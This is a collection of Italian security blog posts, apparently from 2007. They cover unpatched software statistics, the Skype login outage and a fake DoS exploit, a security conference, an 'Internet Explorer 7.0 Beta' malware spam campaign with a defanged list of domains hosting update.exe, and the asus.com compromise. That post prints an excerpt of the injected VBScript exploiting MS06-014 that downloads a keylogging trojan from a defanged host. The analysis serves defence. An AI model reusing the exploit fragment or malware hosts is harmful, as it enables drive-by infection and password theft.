Secondo Secunia, il 20% delle applicazioni installate su Windows non sono aggiornate.
Facciamo un passo indietro. Secunia distribuisce gratuitamente un tool chiamato PSI il quale ricerca tutti i software che non sono aggiornati in termini di patch di sicurezza.
Il rapporto dichiarato è basato su un campione di 14.500.000 applicazioni controllate nei PC degli utenti che utilizzano PSI.

A conti fatti il un quinto di tutte le applicazioni installate ha almeno un problema di sicurezza. Quanti utenti utilizzano il PC per lavoro o per hobby? Quanti di questi conoscono Secunia o i problemi di sicurezza derivanti ad esempio da “privilege escalation” o “remote exploit“?

Penso, purtroppo, che quel dato sia sottostimato altrimenti non mi so spiegare i livelli di successo di bot-net e worm. Si veda in proposito il numero di PC infettati dal “Storm Worm” nelle vacanze natalizie e l’ultimo report di Symantec su bot-net e computer zombie.

Credo poco alle statistiche: molte volte sono volutamente alterate altre sono invece calcolate su un campione “contaminato” che ne altera involontariamente il significato.

Non ne ho voluto parlarne subito per poter avere degli elementi in più. Ora forse è anche troppo tardi, ma si sa, il rientro dalle ferie è sempre difficile.
Penso che in pochi non lo sappiano: dal 16 Agosto, per due giorni, c’è stato un black-out dei server di login di Skype che hanno comportato l’impossibilità di connettersi a milioni di utenti. Per la cronistoria c’è il primo avvertimento dato da skype, il suo aggiornamento e addirittura un articolo di Repubblica arrivato con la dovuta calma.

Dal comunicato ufficiale (disponibile anche in italiano) si apprende come:

The disruption was triggered by a massive restart of our users’ computers across the globe within a very short timeframe as they re-booted after receiving a routine set of patches through Windows Update.

The high number of restarts affected Skype’s network resources. This caused a flood of log-in requests, which, combined with the lack of peer-to-peer network resources, prompted a chain reaction that had a critical impact.

Questo è il grafico creato con l’aggregazione dei dati ufficiali rilasciati da Skype:

Come si può vedere la discesa del numero di utenti connessi alla rete P2P (che forse non è così tanto P2P) è iniziata intorno alle 9:30AM (GMT) di Giovedì 16 Agosto.
Microsoft ha rilasciato le patch Martedì 14 Agosto, ben due giorni prima del down dei server di Skype. Mi verrebbe da pensare che essendo vicino a Ferragosto molti utenti (casalinghi per la maggior parte) abbiano installato le patch solamente il 16 Agosto scorso, ma dalle statistiche Skype si vede come il 15 Agosto erano circa 700.000 gli utenti in meno in confronto al giorno precedente. Ciò, secondo me, non può giustificare un calo improvviso di “supernodi” imputabile al riavvio dopo l’installazione delle patch. In più come fa notare un post su Security Team solo una patch, tra quelle rilasciate da Microsoft, potrebbe richiedere il riavvio del sistema.

Il 17 Agosto è comparso su un sito di sicurezza Russo (http://en.securitylab.ru/poc/extra/301419.php) un exploit che prometteva un DoS verso i server di Skype passando da riga di comando un numero di telefono arbitrario direttamente al client. Grazie anche all’ottima analisi di ascii si è capito che tale codice non era altro che un fake.
Ciò non significa che l’exploit non esista proprio, magari era stato rilasciato da qualcuno che ne aveva sentito parlare “nell’ambiente” ma che non ha avuto le capacità per riprodurlo.

Guarda caso, sempre il 17 Agosto, è stata rilasciata anche una nuova versione di Skype: 3.5.0.214.

Nel primo comunicato, Skype, ha ammesso che oltre ad essersi presentata una situazione particolare nella propria rete P2P, era emerso un bug finora non conosciuto:

Normally Skype’s peer-to-peer network has an inbuilt ability to self-heal, however, this event revealed a previously unseen software bug within the network resource allocation algorithm which prevented the self-healing function from working quickly.

Nel secondo comunicato è stato chiarito che è stata migliorata la resilienza del software stesso:

The parameters of the P2P network have been tuned to be smarter about how similar situations should be handled. Once we found the algorithmic fix to ensure continued operation in the face of high numbers of client reboots, the efforts focused squarely on stabilising the P2P core.

Ognuno tragga le proprie conclusioni, perchè dalle spiegazioni generiche che ha dato Skype, si capisce solo che non gradiscono la full-disclosure. Vedo che anche zen la pensa come me.

L’amico Giovanni Pellerano, di @System, mi segnala l’edizione 2007 di un importante evento nazionale riguardante l’IT-security.

@Systemgroup, una collaborazione tra @System e Bitflow, organizza il V Convegno Net&System Security - analisi e vulnerabilità dei sistemi informatici. L’evento avrà luogo il 27 Novembre 2007 presso il Palazzo dei Congressi di Pisa, e vedrà la partecipazione di alcuni esperti e delle maggiori aziende leader del settore della sicurezza informatica.

Nell’ambito del convegno si terra’ la seconda edizione del Call For Paper, per cui sono previste due categorie di partecipazione; “Professional” e “Student”.

Tutti i paper selezionati saranno inseriti negli atti del convegno ed avranno il valore di una pubblicazione scientifica. Inoltre, agli autori dei migliori elaborati sara’ data la possibilità di presentarli durante l’evento.

Al vincitore di ogni categoria sarà assegnato il riconoscimento come “Best Paper Award”, e per l’autore dell’elaborato piu’ meritevole della categoria “Student” è prevista l’assegnazione di un celluare Linux-Based “Neo1973 Advanced Edition” .

La partecipazione al CfP è gratuita. Maggiori informazioni sono disponibili alla sezione dedicata presente sulla pagina web del convegno.

Nelle ultime ore è stata rilevata una nuova variante delle e-mail di spam “Internet Explorer 7.0 Beta”. Tutte quante hanno un link verso un file eseguibile dal nome “update.exe” ospitato su diversi domini.
Per ingannare i filtri anti-spam il testo, inserito nel corpo della mail, è stato racchiuso in tag HTML in modo che ad un loro controllo risultasse una semplice conversazione tra amici e invece all’apertura dell’e-mail con un qualsiasi client di posta venisse visualizzato solamente il link al file eseguibile.

Questi gli header più significativi:

From: <admin@microsoft.com>
To: xxxxx@xxxxxxxxx.xxx
Subject: Internet Explorer 7.0 Beta

Questi i domini, per ora individuati, che ospitano il file eseguibile:

• httx://accentstaffing.com_/images/update.exe
• httx://mikelike.cd_/update.exe
• httx://xoozee.cd_/update.exe
• httx://merzingo.cd_/update.exe
• httx://endfriends.cd_/update.exe
• httx://netdesks.cd_/update.exe
• httx://pleasedostock.hk_/update.exe
• httx://wordcasts.cd_/update.exe
• httx://abyssrecycling.co.uk_/images/update.exe
• httx://bcweblist.com_/images/update.exe
• httx://actorsandactresses.co.uk_/images/update.exe

(httx e l’underscore dopo il TLD sono stati inseriti per sicurezza)

Il primo nella lista, almeno nelle e-mail che ho ricevuto io, è stato quello più utilizzato. Fortunatamente già molti dei domini nella lista sono stati ripuliti e il link al file eseguibile restituisce un errore HTTP 404.

Il consiglio è quello di bloccare i domini sopra riportati tramite il proprio gateway o proxy di rete, oppure in maniera più semplice aggiungere, sul proprio server mail, dei pattern per il riconoscimento delle e-mail provenienti da “admin@microsoft.com” con oggetto “Internet Explorer 7.0 Beta”.
Per eventuali aggiornamenti rifarsi alla segnalazione dell’ISC.

Ieri, tramite il suo blog, Kaspersky ha segnalato la compromissione del sito asus.com. Stando a quanto detto da loro, il codice all’interno della pagina richiamata tramite un iframe inserito nella home page di asus.com sfrutterebbe il recente bug sui file ANI di Microsoft Windows.
L’ISC ha fatto notare che Asus utilizza un round robin DNS per i Webserver. Quello che nessuno ha detto è che l’unico server ad essere stato compromesso è stato 211.72.249.198, l’unico che raggiunto con www.asus.com presenta la pagina internazionale di Asus.

Tutti gli altri server presentano la home page standard di Asus USA.
Come già detto, i cracker hanno utilizzato un iframe per includere codice JavaScript e VBScript malevolo, ma contrariamente a quanto detto da Kaspersky, esso non sfrutta il bug sui file ANI ma una vulnerabilità in Microsoft Data Access Components corretta con la patch MS06-014.
Ecco come si presenta la parte compromessa della pagina di www.asus.com (click per ingrandire):

La pagina iniettata, ospitata su un Webserver cinese (indirizzo ip 222.73.247.123), contiene del codice JavaScript offuscato, il quale una volta decodificato crea un VBScript appositamente scritto per sfruttare la vulnerabilità su RDS, ne riporto la parte più significativa (ho volutamente modificato http nell’url):
clID1 = "clsi"
clID2 = "d:BD96C556-65A3-11D0-983A-00C04FC29E36"
XML1 = "Mic"
XML2 = "rosoft.XMLHTTP"
AdoSqa1 = "Adodb.S"
AdoSqa2 = "tream"
oGet = "GET"
fname1 = "Tradue.com"
SFO = "Scripting.FileSystemObject"
SApp = "Shell.Application"
dl = "hxxp://www.ok8vs.com/app/ppapp/next3.png"
Set df = document.createElement("object")
L’immagine PNG richiamata è in realtà un Trojan eseguibile su piattaforme Windows (offuscato) (32bit x86) della famiglia PSW i quali fungono da keylogger e “steal password”.

La cosa grave, a mio avviso, è che a due giorni dalla segnalazione Asus non ha ancora fatto niente per evitare l’infezione dei propri visitatori.